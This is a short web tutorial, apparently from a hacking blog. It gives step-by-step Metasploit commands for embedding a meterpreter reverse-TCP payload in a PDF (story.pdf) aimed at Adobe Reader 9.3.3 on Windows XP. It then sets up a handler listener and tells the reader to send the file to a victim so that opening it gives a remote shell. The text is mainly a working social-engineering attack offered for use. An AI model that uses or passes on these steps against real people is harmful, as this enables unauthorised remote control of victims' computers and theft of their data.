How to Attack on Remote PC using Adobe PDF Escape EXE Social Engineering (No JavaScript)

This module embeds a Metasploit payload into an existing PDF file in a non-standard method. The resulting PDF can be sent to a target as part of a social engineering attack.

Exploit Targets

0 – Adobe Reader <= v9.3.3 (Windows XP SP3 English) (default)

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs

Msf exploit (adobe_pdf_embedded_exe_nojs)>set payload windows/meterpreter/reverse_tcp

Msf exploit (adobe_pdf_embedded_exe_nojs)>set lhost 192.168.1.3 (IP of Local Host)

Msf exploit (adobe_pdf_embedded_exe_nojs)>set filename story.pdf

Msf exploit (adobe_pdf_embedded_exe_nojs)>exploit

After we successfully generate the malicious PDF, it will stored on your local computer

/root/.msf4/local/story.pdf

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.3

exploit

Now send your story.pdf files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer

1 Comment How to Attack on Remote PC using Adobe PDF Escape EXE Social Engineering (No JavaScript)

Leave a Reply

Your email address will not be published. Required fields are marked *